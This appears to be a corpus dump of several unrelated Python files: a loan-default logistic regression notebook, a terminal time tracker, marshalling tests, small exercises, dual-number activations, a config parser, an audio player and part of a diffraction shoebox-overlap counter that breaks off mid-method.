train_ratio = 0.7
train_size = int(row * train_ratio)
train_x = x.iloc[shuffle_indexes[0: train_size], :]
test_x = x.iloc[shuffle_indexes[train_size: ], :]
train_y = y.iloc[shuffle_indexes[0: train_size]]
test_y = y.iloc[shuffle_indexes[train_size: ]]
# In[10]:
model1 = sm.Logit(train_y, train_x).fit()
model1.summary()
# According to the P-values, we pick the variables that are significant.
# In[11]:
columns_to_keep = ["issue_d", "int_rate", "home_mort", "home_own", "FICO", "loantoincome", "dti", "delinq_2yrs", "inq_last_6mths", "pub_rec", "acc_open_past_24mths", "mo_sin_old_il_acct", "mort_acc", "mths_since_recent_bc", "num_rev_accts", "num_rev_tl_bal_gt_0", "pct_tl_nvr_dlq", "percent_bc_gt_75", "total_bal_ex_mort", "total_il_high_credit_limit", "grade_B", "grade_C", "grade_D", "grade_E", "grade_F", "grade_G", "emp_length_10+ years", "emp_length_2 years", "emp_length_3 years", "emp_length_4 years", "emp_length_5 years", "emp_length_6 years", "emp_length_7 years", "emp_length_8 years", "emp_length_9 years", "emp_length_< 1 year", "intercept"]
train_x = train_x[columns_to_keep]
test_x = test_x[columns_to_keep]
model2 = sm.Logit(train_y, train_x).fit()
model2.summary()
# In[12]:
predict_prob = model2.predict(test_x)
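# Pick the classification cut-off so that the number of predicted positives
# matches the number of actual positives in the test set.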
threshold_position = sum(test_y == 1)
threshold = sorted(predict_prob, reverse=True)[threshold_position]
predict_y = predict_prob.apply(lambda x: 1 if x > threshold else 0)
test_y_list = test_y.values.tolist()
predict_y_list = predict_y.values.tolist()
tp = int(((predict_y == 1) & (test_y == 1)).sum()) # True Positive
fn = int(((predict_y == 0) & (test_y == 1)).sum()) # False Negative
fp = int(((predict_y == 1) & (test_y == 0)).sum()) # False Positive
tn = int(((predict_y == 0) & (test_y == 0)).sum()) # True Negative
matrix_of_confusion = pd.DataFrame([[tp, fp, tp + fp],
[fn, tn, fn + tn],
[tp + fn, fp + tn, tp + fp + fn + tn]],
columns = ["actual good", "actual bad", "total"],
index = ["predicted good", "predicted bad", "total"])
matrix_of_confusion
# In[13]:
f,ax=plt.subplots()
conf_matrix = confusion_matrix(test_y, predict_y)
print(conf_matrix) # print it out for inspection
sns.heatmap(conf_matrix, annot=True, ax=ax) # draw a heatmap
ax.set_title('confusion matrix') # title
ax.set_xlabel('predict') # x axis
ax.set_ylabel('actual') # y axis
# In[14]:
fpr, tpr, thresholds = roc_curve(test_y, predict_prob)
roc_auc =auc(fpr, tpr)
plt.figure()
lw = 2
plt.figure(figsize=(10,10))
plt.plot(fpr, tpr, color='darkorange',
         lw=lw, label='ROC curve (area = %0.2f)' % roc_auc) ### x axis: false positive rate, y axis: true positive rate
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver operating characteristic example')
plt.legend(loc="lower right")
plt.show()
print(roc_auc)
# In[ ]:
| true |
94a27b5b5a5f4f772a6b0a1eb168b1f8e7358d5a
|
Python
|
mmubarak0/TimeTracker
|
/time.py
|
UTF-8
| 8,994 | 2.8125 | 3 |
[] |
no_license
|
#!/usr/bin/python3
import time
import os
import shelve
import datetime
# TODO > start counting the time when I start this program (start_time) $START
# TODO > pause counting the time when I press P (pause_time)
# TODO > continue counting the time when I press n (continue_time)
# TODO > stop counting the time when I press q (stop_time) $STOP
# TODO > save the time spent after pressing q in status.txt
# file in days > hours > minute>second format (save_time) $TIME
# TODO > calculate the total time spent in the same format
# by all time (save_time_total) $ALL_TIME
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# allTimeStart == tstart
allTimeStart = []
# allTimeStop == tstop
allTimeStop = []
etimstat = time.strftime("%I:%M:%S")
tume = datetime.datetime.now()
print("""%s
[1]برمجة
[2]العاب
[3]ميكانيكية
[4]كهربية
[5]علم المواد
[6]ديناميكية
[7]تحليلية
[8]تفاضلية
[9]كيمياء
[10]اشياء اخرى
%s""" %(bcolors.OKBLUE, bcolors.ENDC))
ent = input("Enter : ")
if ent == "":
ent = 0
else:
ent = int(ent)
lisent = [0, "programming", "gaming", "mechanic", "electric", "material",
"dynamics", "analysis", "deffrential_eq", "chemics", "other_staff"]
try:
shelfFile = shelve.open(
"/home/ki2kid/dev/python/timer/%s/db/db" % lisent[ent])
shelfFileDay = shelve.open(
"/home/ki2kid/dev/python/timer/%s/db/db%s" % (lisent[ent], tume.day))
except Exception:
os.mkdir("/home/ki2kid/dev/python/timer/%s/" % lisent[ent])
os.mkdir("/home/ki2kid/dev/python/timer/%s/db" % lisent[ent])
shelfFile = shelve.open(
"/home/ki2kid/dev/python/timer/%s/db/db" % lisent[ent])
shelfFileDay = shelve.open(
"/home/ki2kid/dev/python/timer/%s/db/db%s" % (lisent[ent], tume.day))
def start_time():
startTime = time.time()
allTimeStart.append(startTime)
return allTimeStart
def stop_time():
stopTime = time.time()
allTimeStop.append(stopTime)
return allTimeStop
# list pause time
listPauseTime = []
def addPauseTime():
n = 0
for i in listPauseTime:
n = n + i
return n
start_time()
# Old --------------------------------
def oldcode():
# x = input("enter ")
# if x == "p":
# pauseTimeStart = time.time()
# x = input("enter ")
# if x == "n":
# pauseTimeEnd = time.time()
# pauseTime = (pauseTimeEnd) - (pauseTimeStart)
# pause = []
# for i in str(pauseTime):
# if i == ".":
# break
# else:
# pause.append(i)
# print("".join(pause))
# x = input("enter ")
# if x == "q":
# stop_time()
# save_time = allTimeStop[0] - allTimeStart[0] - pauseTime
# alltime = []
# for i in str(save_time):
# if i == ".":
# break
# else:
# alltime.append(i)
# # print("".join(alltime))
# START = allTimeStart[0]
# STOP = allTimeStop[0]
# TIME = "".join(alltime)
# ALL_TIME = save_time
# # print START
# starSTART = []
# for i in str(START):
# if i == ".":
# break
# else:
# starSTART.append(i)
# print("".join(starSTART))
# # print STOP
# starSTOP = []
# for i in str(STOP):
# if i == ".":
# break
# else:
# starSTOP.append(i)
# print("".join(starSTOP))
# # # print TIME
# # starTIME = []
# # for i in str(TIME):
# # if i == ".":
# # break
# # else:
# # starTIME.append(i)
# # print("".join(starTIME))
# print(TIME)
# # print ALL_TIME
# starALL_TIME = []
# for i in str(ALL_TIME):
# if i == ".":
# break
# else:
# starALL_TIME.append(i)
# print("".join(starALL_TIME))
# addPauseTime()
pass
# Old code --------------------------------
# Redefined code --------------------------------
print("""
the counter has been started since you see this message ...
[1] type (p) to pause the time counter, (n) to continue .
[2] type (q) to save status and quite .
[3] type (show) to show status .
[4] type (l) to make loop .
[5] type (h) to show this help message .
""")
n = True
while n:
x = input("Press ")
# help message
if x == "h":
print("""
the counter has been started since you see this message ...
[1] type (p) to pause the time counter, (n) to continue .
[2] type (q) to save status and quite .
[4] type (l) to make loop .
[5] type (h) to show this help message .
""")
# reset the counter
if x == "l":
start_time()
# pause the time counter
if x == "p":
pauseTimeStart = time.time()
print("the counter has been paused press (n) to continue ....")
# continue the time counter , save the pause time
if x == "n":
print("counter is now working ...")
pauseTimeEnd = time.time()
try:
pauseTime = (pauseTimeEnd) - (pauseTimeStart)
except Exception:
pass
# adding pause times
try:
listPauseTime.append(pauseTime)
except Exception:
pass
# save status and quite
if x == "q":
stop_time()
save_time = allTimeStop[0] - allTimeStart[0] - addPauseTime()
seconds = round(save_time)
minutes = round(round(save_time)/60)
hours = round(round(save_time)/(60*60), 2)
days = round(round(save_time)/(60*60*24), 2)
if round(round(save_time)/(60*60), 2) >= 15:
print(f"\n{bcolors.HEADER}time {seconds} seconds >> \
{minutes} minute >> \
{hours} hours >> \
{days} days {bcolors.ENDC}⚠️")
elif round(round(save_time)/(60)) < 15:
print(f"\n{bcolors.HEADER}time {round(save_time)} seconds >> \
{round(round(save_time)/60, 2)} minute{bcolors.ENDC}⚠️")
else:
print(f"\n{bcolors.HEADER}time {seconds} seconds >> \
{minutes} minute >> \
{hours} hours >> \
{days} days{bcolors.ENDC}⚠️")
n = False
print(f"\n{bcolors.OKCYAN}started at", etimstat)
print("Ended at ", time.strftime("%I:%M:%S"), f"{bcolors.ENDC}")
try:
shelfFile["cats"] += allTimeStart
shelfFile["dogs"] += allTimeStop
except Exception:
shelfFile["cats"] = allTimeStart
shelfFile["dogs"] = allTimeStop
try:
# for day
shelfFileDay["cats"] += allTimeStart
shelfFileDay["dogs"] += allTimeStop
except Exception:
# for day
shelfFileDay["cats"] = allTimeStart
shelfFileDay["dogs"] = allTimeStop
ss = shelfFile["cats"]
sp = shelfFile["dogs"]
ssday = shelfFileDay["cats"]
spday = shelfFileDay["dogs"]
TimeTakenAtThisSession = round(sp[-1] - ss[-1])
HistoryOfProgram = round((sp[-1] - ss[0]))
def total_time_today_for_this_program():
day = []
for i in range(len(ssday)):
try:
day.append(spday[-i] - ssday[-i])
except Exception:
break
zday = 0
for i in day:
zday += i
return zday
def total_time_from_creating_this_program():
x = []
for i in range(len(ss)):
try:
x.append(sp[-i] - ss[-i])
except Exception:
break
zx = 0
for i in x:
zx += i
print(f"{bcolors.OKBLUE}total time this program was running since first launch is :{bcolors.ENDC}")
return zx
TOTAL = total_time_from_creating_this_program()
shelfFile.close()
TOTALDAY = total_time_today_for_this_program()
shelfFileDay.close()
final = ('"'+str(round(TOTAL))+' seconds >> \
'+str(round(TOTAL/60, 2))+' minute >> \
'+str(round(TOTAL/60/60, 2))+' hours >> \
'+str(round(TOTAL/60/60/24, 2))+' days 💙️"')
finalday = ('"'+str(round(TOTALDAY))+' seconds >> \
'+str(round(TOTALDAY/60, 2))+' minute >> \
'+str(round(TOTALDAY/60/60, 2))+' hours >> \
'+str(round(TOTALDAY/60/60/24, 2))+' days 💙️"')
print(final)
# os.system("echo %s >> ./status.txt" % str(final))
tumme = f"{tume.day}_{tume.month}_{tume.year}"
try:
os.mkdir("/home/ki2kid/dev/python/timer/%s/statusdb" % lisent[ent])
except Exception:
pass
try:
os.mkdir("/home/ki2kid/dev/python/timer/%s/statusdb/bydays" % lisent[ent])
except Exception:
pass
# SAVE
os.system("echo %s > /home/ki2kid/dev/python/timer/%s/statusdb/status%s.txt" %
(str(final), lisent[ent], tumme))
os.system("echo %s > /home/ki2kid/dev/python/timer/%s/statusdb/bydays/status%s.txt" %
(str(finalday), lisent[ent], tumme))
print(f"""{bcolors.OKBLUE}
[s]show today status
{bcolors.ENDC}""")
endore = input("or press any key to exit ... ")
if endore == "s":
os.system("less /home/ki2kid/dev/python/timer/%s/statusdb/bydays/status%s.txt" %
(lisent[ent], tumme))
# while True:
# print(finalday, end="\r")
# time.sleep(1)
# print(final, end="\r")
# time.sleep(1)
| true |
1c3024ab9db9d26e95daa20e6cb981c064b09f18
|
Python
|
hexane360/pyRPC
|
/pyrpc/test_marshal.py
|
UTF-8
| 2,460 | 2.75 | 3 |
[] |
no_license
|
import math
import re
import pytest
import numpy as np
from .marshal import marshal_to_str, unmarshal_from_str
from .marshal import marshal_obj
from .marshal import marshal, unmarshal
from .marshal import MARSHAL_VERSION_STR
TEST_ROUNDTRIP = {
"int": 5,
"float": 1./32.,
"infinity": math.inf,
"complex": complex(1., -1.),
"str": "Test ⊗ String\0",
"bytes": b"\0\5\10text\rs",
"none": None,
"collections": [1, 2, {'a': 5, 'b': [1, math.inf, 3]}],
"set": set([1, 5, 8]),
}
@pytest.mark.parametrize("name,obj", TEST_ROUNDTRIP.items())
def test_roundtrip(name, obj):
assert obj == unmarshal_from_str(marshal_to_str(obj))
def test_ndarray():
arr = np.array(range(18), dtype=np.uint8)
arr = arr.reshape((3, 3, 2))
roundtrip = unmarshal_from_str(marshal_to_str(arr))
assert np.array_equal(arr, roundtrip)
assert arr.dtype == roundtrip.dtype
assert arr.shape == roundtrip.shape
assert marshal_obj(arr) == {
'type': 'ndarray',
'shape': (3, 3, 2),
'size': 18,
'data': "k05VTVBZAwB0AAAAeydkZXNjcic6ICd8dTEnLCAnZm9ydHJhb"
"l9vcmRlcic6IEZhbHNlLCAnc2hhcGUnOiAoMywgMywgMiksIH"
"0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA"
"gICAgICAgICAgICAgICAgIAoAAQIDBAUGBwgJCgsMDQ4PEBE="
}
TEST_MARSHAL = {
"dict": (
{'a': 5, 'b': 10},
{'type': 'dict', 'data': {'a': 5, 'b': 10}}
),
"nested_dict": (
{'a': {'a': 5, 'b': 10}, 'd': 10},
{'type': 'dict',
'data': {'a': {'type': 'dict',
'data': {'a': 5, 'b': 10}},
'd': 10}}
),
}
@pytest.mark.parametrize("name,obj,expected", ((k, *v) for (k, v) in TEST_MARSHAL.items()))
def test_marshal(name, obj, expected):
assert marshal_obj(obj) == expected
def test_version_marshal():
assert marshal(5) == {
'v': MARSHAL_VERSION_STR,
'data': 5,
}
def test_marshal_ref():
class TestType():
pass
def make_ref(obj):
return '/ref_url'
assert marshal_obj(TestType(), make_ref) == {
'type': 'ref', 'url': '/ref_url', 'class': 'TestType'
}
def test_version_unmarshal():
with pytest.raises(TypeError, match=re.escape("Expected a dict, got '<class 'int'>' instead.")):
unmarshal(5)
with pytest.raises(ValueError, match=re.escape("Could not decode protocol version info.")):
unmarshal({
'data': 5
})
with pytest.raises(ValueError, match=re.escape("Unsupported protocol version '0.0'")):
unmarshal({
'v': '0.0',
'data': 5
})
assert unmarshal({'v': MARSHAL_VERSION_STR, 'data': 5}) == 5
| true |
624af699a94883688daf8c52c1b4115bfc42c5a0
|
Python
|
HenriqueSilva29/infosatc-lp-avaliativo-06
|
/atividade 2.py
|
UTF-8
| 292 | 3.5625 | 4 |
[] |
no_license
|
caracter = ""
def parametroCaracter ():
caracter = input ( "Insira os caracteres {[()]}:" )
if "{[()]}" in caracter:
print ( "Parâmetro certo" )
        return True
else:
print ( "ops, algo está errado!" )
        return False
parametroCaracter ()
| true |
0237bbc540daab859fb1efec7740c0f827901989
|
Python
|
Paruyr31/Basic-It-Center
|
/Basic/Homework.2/21_.py
|
UTF-8
| 200 | 3.453125 | 3 |
[] |
no_license
|
a = int(input("a = ")) # nermucum enq a
b = int(input("b = ")) # nermucum enq b
c = int(input("c = ")) # nermucum enq c
max = a
if b>max:
max = b
if c>max:
max = c
print("Max = "+str(max))
| true |
4adfc4672d7817e46706f81b0a75518436a71c22
|
Python
|
paulhkoester16/automatic_diff
|
/automatic_diff/activations.py
|
UTF-8
| 452 | 3 | 3 |
[] |
no_license
|
'''
Standard library of activation functions, implemented for dual numbers.
https://en.wikipedia.org/wiki/Activation_function
'''
from automatic_diff.dual_number import DualNumber
def identity(d: DualNumber):
'''Identity activation'''
return d
def softsign(d: DualNumber):
'''Softsign activation'''
return d/(1 + abs(d))
def isru(d: DualNumber, alpha=1.0):
'''Inverse square root unit'''
return d/(1 + alpha * d**2)**0.5
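# Example (a sketch; it assumes DualNumber is constructed as DualNumber(value, derivative)):
#   x = DualNumber(2.0, 1.0)
#   y = softsign(x)   # y then carries both softsign(2.0) and its derivative at 2.0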
| true |
a64151e7e9ce7fdb013470ce6b6f0df8619bc058
|
Python
|
arlenk/pi-monitor
|
/pi_monitor/configuration/parser.py
|
UTF-8
| 1,641 | 3.109375 | 3 |
[
"MIT"
] |
permissive
|
import os
from pathlib import Path
import toml
def parse_config(config_file: str, dotenv_file: str, include_os_env: bool) -> dict:
"""
Parse configuration file(s)
"""
config_file = Path(config_file)
if not config_file.exists():
raise IOError("could not find config file: {}".format(config_file))
if dotenv_file:
dotenv_file = Path(dotenv_file)
if not dotenv_file.exists():
raise IOError("could not find .env file: {}".format(dotenv_file))
env = dict()
if include_os_env:
env = os.environ.copy()
if dotenv_file:
dotenv = _parse_dotenv(dotenv_file)
env.update(dotenv)
config = _parse_config(config_file, env)
return config
def _parse_dotenv(path: Path) -> dict:
"""
Parse .env file into a simple dict
"""
env = dict()
with path.open() as file:
for iline, line in enumerate(file):
line = line.strip()
if '=' not in line:
raise ValueError("line {} [line #{}] in {} is missing "
"a key value pair".format(line, iline, path))
key, value = line.split('=', 1)
env[key] = value
return env
def _parse_config(path: Path, env: dict) -> dict:
"""
Parse config file, with optional environment variables
Any values matching $VALUE pattern will be substituted by env[VALUE]
"""
path = Path(path)
if not path.exists():
raise IOError("could not find config file: {}".format(path))
s = path.open().read()
s = s.format(**env)
config = toml.loads(s)
return config
| true |
185b664c190a9719de4fb1787cba8b2277c8eba7
|
Python
|
ymm000596/dac
|
/play.py
|
UTF-8
| 1,655 | 2.59375 | 3 |
[] |
no_license
|
#===================================================================
# FileName: play_audio.py
# Author: Yin Mingming
# Email: ymingming@gmail.com
# WebSite: http://www.????.com
# CreateTime: 2010.01.01
#===================================================================
import time
import numpy as np
import pyaudio
import guiqwt.pyplot as plt
def test_sig(fs,fc):
pa = pyaudio.PyAudio()
frames = 16384
t = np.arange(frames)/float(fs)
s = np.cos(2.0*np.pi*fc*t).astype(np.float32)
stream = pa.open(format=pyaudio.paFloat32,channels = 1,rate =int(fs),output = True,frames_per_buffer=frames)
#mv = np.max(np.abs(s))
#s = s/mv
#print len(s),s.mean(),s.max(),s.min()
data = s.tostring()
idx=1
while True:
print idx
stream.write(data)
idx += 1
stream.close()
pa.terminate()
def main(fs,filename,cnt,dt):
pa = pyaudio.PyAudio()
s = np.loadtxt(filename).astype(np.float32)
print len(s),s.mean(),s.max(),s.min()
frames = len(s)
stream = pa.open(format=pyaudio.paFloat32,channels = 1,rate =int(fs),output = True,frames_per_buffer=frames)
mv = np.max(np.abs(s))
s = s/mv
data = np.zeros(frames,dtype=np.float32)
data[:len(s)] = s[:]
data /= np.max(np.abs(data))
data = data.tostring()
for k in xrange(cnt):
print k+1,'of',cnt
stream.write(data)
time.sleep(dt)
stream.close()
pa.terminate()
if __name__ == '__main__':
fs = 44100
main(fs,"../dsp/m_code_1_2_3_4_5_6.txt",10000,0.1)
#main(fs,"../dsp/m_code_1.txt",10000,0.1)
#test_sig(fs,18000)
| true |
10f51dd4a5fb286a8792b6009658ac20c1365352
|
Python
|
Assaf-Mor/Blind-75-Must-Do-Leetcode
|
/CombinationSum.py
|
UTF-8
| 755 | 3.28125 | 3 |
[] |
no_license
|
class Solution(object):
def combinationSum(self, candidates, target):
"""
:type candidates: List[int]
:type target: int
:rtype: List[List[int]]
"""
result = [] # init the result set
def dfs(i, current, total):
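            # i: index of the candidate being considered, current: the partial
            # combination built so far, total: its running sum. Each call either
            # keeps reusing candidates[i] or moves on to i + 1 (backtracking).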
if total == target:
result.append(current.copy())
return
if i >= len(candidates) or total > target:
return
current.append(candidates[i])
dfs(i, current, total + candidates[i])
current.pop()
dfs(i + 1, current, total)
dfs(0, [], 0)
return result
if __name__ == "__main__":
sol = Solution()
print(sol.combinationSum([2,3,6,7],7))
| true |
ad9d670ce7319be6c1dac8702c94cce6a8805718
|
Python
|
IraPS/homework
|
/1.py
|
UTF-8
| 844 | 2.875 | 3 |
[] |
no_license
|
import nltk
from nltk.stem import WordNetLemmatizer
from nltk.corpus import wordnet
wnl = WordNetLemmatizer()
file = open('input.txt', 'r', encoding='utf-8')
text = file.read().split()
t = 'he was learning how to drive'.split()
print(type(t))
t = nltk.pos_tag(t)
mappedtags = {'NN': 'n', 'NNS': 'n', 'NNPS': 'n', 'NNP': 'n',
'JJ': 'a', 'JJS': 's', 'JJR': 's',
'RB': 'r', 'RBS': 's',
              'VB': 'v', 'VBD': 'v', 'VBN': 'v', 'VBP': 'v', 'VBZ': 'v', 'VBG': 'v'}
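# Map Penn Treebank POS tags to the WordNet POS codes the lemmatizer expects.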
for el in t:
print(el)
if el[1] in mappedtags:
pos = mappedtags[el[1]]
print(wnl.lemmatize(el[0], pos))
else:
print(wnl.lemmatize(el[0]))
#print(wnl.lemmatize('touching', pos='n'))
#nltk.help.upenn_tagset()
'''
import pymorphy2
morph = pymorphy2.MorphAnalyzer()
print(morph.parse('dogs'))
'''
| true |
7705cfc440d27f113c61f9059a3caf84c8f97c09
|
Python
|
thebusfactor/p11
|
/src/model/bus.py
|
UTF-8
| 1,402 | 3.125 | 3 |
[
"MIT"
] |
permissive
|
# MIT License
# Copyright (c) 2018 ENGR301-302-2018 / Project-11
class Bus:
"""
Parameters
----------
tl_x: int
Top left x coordinate.
tl_y: int
Top left y coordinate.
br_x: int
Bottom right x coordinate.
br_y: int
Bottom right y coordinate.
"""
tl_x: int
tl_y: int
br_x: int
br_y: int
flagged: bool
dir = "up"
has_intersected: bool
confidence: float
def __init__(self, tl_x, tl_y, br_x, br_y, confidence, flagged):
self.tl_x = tl_x
self.tl_y = tl_y
self.br_x = br_x
self.br_y = br_y
self.flagged = flagged
self.has_intersected = False
self.confidence = confidence
def set_t1(self, new_tl_x, new_tl_y, new_br_x, new_br_y, confidence):
self.tl_x = new_tl_x
self.tl_y = new_tl_y
self.br_x = new_br_x
self.br_y = new_br_y
self.confidence = confidence
def set_flagged(self, change):
self.flagged = change
def set_dir(self, new_dir):
self.dir = new_dir
def get_tl_x(self):
return self.tl_x
def set_has_intersected(self, has_intersected):
self.has_intersected = has_intersected
def get_has_intersected(self):
return self.has_intersected
def get_confidence(self):
return self.confidence
| true |
107ecccac093a3904fede11ca0abcbcc23ab2083
|
Python
|
betty29/code-1
|
/recipes/Python/146066_Exiting_loop_single_key/recipe-146066.py
|
UTF-8
| 570 | 3.375 | 3 |
[
"Python-2.0",
"MIT"
] |
permissive
|
import msvcrt
while 1:
print 'Testing..'
# body of the loop ...
if msvcrt.kbhit():
if ord(msvcrt.getch()) == 27:
break
"""
Here the key used to exit the loop was <ESC>, chr(27).
You can use the following variation for special keys:
if ord(msvcrt.getch()) == 0:
if ord(msvcrt.getch()) == 59: # <F1> key
break
With the following, you can discover the codes for the special keys:
if ord(msvcrt.getch()) == 0:
print ord(msvcrt.getch())
break
Use getche() if you want the key pressed be echoed."""
| true |
88c0b1031a0e46c762b35450c7a1e8d1e2cb8252
|
Python
|
egrahl/iolite
|
/src/iolite/overlaps/overlapping_spots.py
|
UTF-8
| 30,939 | 2.8125 | 3 |
[
"BSD-2-Clause"
] |
permissive
|
import itertools
from timeit import default_timer as timer
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import pylab
from dials.array_family import flex
from dxtbx.model.experiment_list import ExperimentListFactory
from dials.util.options import flatten_experiments
class OverlapCounter:
""" A class that counts the overlaps of shoeboxes of spots on imagesets.
The overlaps can be counted either per pixel or per shoebox."""
def __init__(self, inputfile, num_bins, outputfile_l, outputfile_t, run_shoeboxes):
"""
The overlap counter is initialized with default settings
        for the filename to open, the number of resolution bins,
        the name of the output file containing the overlaps per resolution,
        the name of the output file containing the overlaps per dataset,
        and the boolean that decides whether the overlaps should be counted per
shoebox.
:param str inputfile: name of expt file that contains the reflection
table (default= "13_integrated.expt")
:param int num_bins: number of resolution bins (default:50)
:param str outputfile_l: name of outputfile written containing overlaps
per resolution bin (default: overlap_lists)
:param str outputfile_t: name of outputfile written containing average
overlaps (default: overlap_total)
:param bool run_shoeboxes: The boolean which decides whether overlaps
per shoebox should be run. If set to False,
overlaps per pixel will be run. (default:True)
"""
self.inputfile = inputfile
self.num_bins = num_bins
self.outputfile_l = outputfile_l
self.outputfile_t = outputfile_t
self.run_shoeboxes = run_shoeboxes
def np_resolution(self, x_dim, y_dim, panel, beam):
"""
This function writes a 2D numpy array of the resolutions (1/d^2)
corresponding to the pixels on the image.
:param int x_dim: width of the image and resolution numpy array
:param int y_dim: length of the image and resolution numpy array
        :param panel: detector panel used to look up the resolution at each pixel
        :param beam: beam model that provides the incident beam vector s0
:returns: 2D numpy array containing the resolutions (1/d^2)
"""
resolution = np.zeros((y_dim, x_dim))
for y in range(y_dim):
for x in range(x_dim):
d = panel.get_resolution_at_pixel(beam.get_s0(), (x, y))
resolution[y, x] = 1 / d ** 2
return resolution
def prepare_bins_shoebox(self, vmax, vmin, num_bins):
"""
This function prepares resolution bins for counting overlaps
per shoebox.
:param float vmax: maximum resolution in 1/d^2
:param float vmin: minimum resolution in 1/d^2
:param int num_bins: number of resolution bins
        :returns: list of the average resolution of each resolution bin
                  and the resolution interval of the bins
"""
d2_list = []
intervall = (vmax - vmin) / (num_bins)
for i in range(num_bins):
d2 = vmin + ((2 * i + 1) / 2) * intervall
d2_list.append(d2)
return d2_list, intervall
def assign_shoebox_to_resolution_bin(self, d2_shoebox, vmin, vmax, intervall):
"""
This function assigns a shoebox to a resolution bin by writing an index
array, which contains the indices of the resolution bin in the resolution
bin list the shoebox belongs to. Additionally, the weight of each resolution
bin is recorded.
:param list d2_shoebox: list of resolutions in 1/d^2 of each shoebox
:param float vmax: maximum resolution in 1/d^2
:param float vmin: minimum resolution in 1/d^2
        :param float intervall: resolution interval of the resolution bins
        :returns: numpy array of bin indices (one per shoebox) and list of bin weights
        """
index_list = []
weight = [0] * self.num_bins
num_bins = self.num_bins
for d2 in d2_shoebox:
if d2 == vmin:
index = 0
elif d2 >= vmax:
index = num_bins - 1
else:
index = int((d2 - vmin - intervall / 2) / intervall)
index_list.append(index)
weight[index] += 1
index_array = np.array(index_list)
return index_array, weight
def prepare_bins_pixel(self, vmax, vmin, num_bins, resolution):
"""This function sets bins with resolution ranges and a list of indices
of the bin in the resolution bin list to enable referring back from a
pixel to the right resolution bin. Additionally it tracks how many pixels
go into each bin.
:param float vmax: maximum 1/d^2 value of image
:param float vmin: minimum 1/d^2 value of image
:param int num_bins: number of resolution bins
:param numpy array resolution: 2D numpy array containing the 1/d^2 values
for each pixel
:returns: list of average value of resolution bins, 1D numpy array of
indices in the resolution bin list, list of weight of bins
"""
d2_list = []
weight = [0] * num_bins
resolution_1d = resolution.reshape(-1)
index_list = []
intervall = (vmax - vmin) / (num_bins)
for i in range(num_bins):
d2 = vmin + ((2 * i + 1) / 2) * intervall
d2_list.append(d2)
for d2 in resolution_1d:
if d2 == vmin:
index = 0
elif d2 == vmax:
index = num_bins - 1
else:
index = int((d2 - vmin - intervall / 2) / intervall)
index_list.append(index)
weight[index] += 1
index_array = np.array(index_list)
return d2_list, index_array, weight
def write_bg_and_fg_mask(self, reflections, shoebox, y_dim, x_dim, z):
"""This function writes masks (one for forground, one for background)
of the shape of the image that contain the counts of shoeboxes that
have a foreground/background at the specific pixels.
:param dials_array_family_flex_ext.reflection_table reflections: reflection table
        :param list shoebox: list that contains all shoeboxes on the image
:param int y_dim: height of the image
:param int x_dim: width of the image
:param int z: index of image in dataset
:returns: masks of counts of background and foreground pixels in shoeboxes
"""
# Get the bounding box overlaps
bbox_overlaps = reflections.find_overlaps()
# create empty masks with the shape of the image
n_background = np.zeros(dtype=int, shape=(y_dim, x_dim))
n_foreground = np.zeros(dtype=int, shape=(y_dim, x_dim))
for edge in bbox_overlaps.edges():
# get indices of overlapping shoeboxes in the shoebox list
index1 = bbox_overlaps.source(edge)
index2 = bbox_overlaps.target(edge)
# avoid counting overlaps twice
if index1 > index2:
bbox1 = shoebox[index1].bbox
bbox2 = shoebox[index2].bbox
mask1 = shoebox[index1].mask.as_numpy_array()
mask2 = shoebox[index2].mask.as_numpy_array()
shoebox_mask = [mask1, mask2]
shoebox_bbox = [bbox1, bbox2]
indices = [index1, index2]
# calculate coordinates of overlap
x0 = max(bbox1[0], bbox2[0], 0)
x1 = min(bbox1[1], bbox2[1], x_dim)
y0 = max(bbox1[2], bbox2[2], 0)
y1 = min(bbox1[3], bbox2[3], y_dim)
assert x1 > x0
assert y1 > y0
# add background and foreground information of shoeboxes to overall masks
for mask, bbox, index in zip(shoebox_mask, shoebox_bbox, indices):
x0m, x1m, y0m, y1m, z0m, _ = bbox
sub_mask = mask[
(z - z0m), (y0 - y0m) : (y1 - y0m), (x0 - x0m) : (x1 - x0m)
]
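                    # mask bit 1 flags a valid pixel, bit 2 background and bit 4 foreground,
                    # so (mask & 3) == 3 selects valid background pixels and
                    # (mask & 5) == 5 selects valid foreground pixels.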
n_background[y0:y1, x0:x1] += (sub_mask & 3) == 3
n_foreground[y0:y1, x0:x1] += (sub_mask & 5) == 5
# set submask values to zero to avoid counting shoeboxes double
sub_mask[sub_mask == 3] = 0
sub_mask[sub_mask == 5] = 0
shoebox[index].mask = flex.int(mask)
return n_background, n_foreground
def write_overlaps_per_shoebox(self, reflections, shoebox, y_dim, x_dim, z):
"""
This function counts shoebox overlaps (background/background,
foreground/foreground, foreground/background, background/foreground)
for each shoebox.
:param reflections: the reflection table
:param list shoebox: the list containing the shoeboxes on one image
:param int y_dim: the height of the image
:param int x_dim: the width of the image
:param int z: the index of the current image
:returns: lists of the fg/fg,fg/bg,bg/fg and bg/bg overlaps per shoebox
"""
# Get the bounding box overlaps
bbox_overlaps = reflections.find_overlaps()
# create empty masks with the shape of the image
n_background = np.zeros(dtype=int, shape=(y_dim, x_dim))
n_foreground = np.zeros(dtype=int, shape=(y_dim, x_dim))
no_shoeboxes = len(shoebox)
fg_fg = [0] * no_shoeboxes
fg_bg = [0] * no_shoeboxes
bg_fg = [0] * no_shoeboxes
bg_bg = [0] * no_shoeboxes
# loop through the overlaps
for edge in bbox_overlaps.edges():
# get indices of overlapping shoeboxes in the shoebox list
index1 = bbox_overlaps.source(edge)
index2 = bbox_overlaps.target(edge)
# avoid counting overlaps twice
if index1 > index2:
bbox1 = shoebox[index1].bbox
bbox2 = shoebox[index2].bbox
mask1 = shoebox[index1].mask.as_numpy_array()
mask2 = shoebox[index2].mask.as_numpy_array()
# calculate coordinates of overlap
x0 = max(bbox1[0], bbox2[0], 0)
x1 = min(bbox1[1], bbox2[1], x_dim)
y0 = max(bbox1[2], bbox2[2], 0)
y1 = min(bbox1[3], bbox2[3], y_dim)
assert x1 > x0
assert y1 > y0
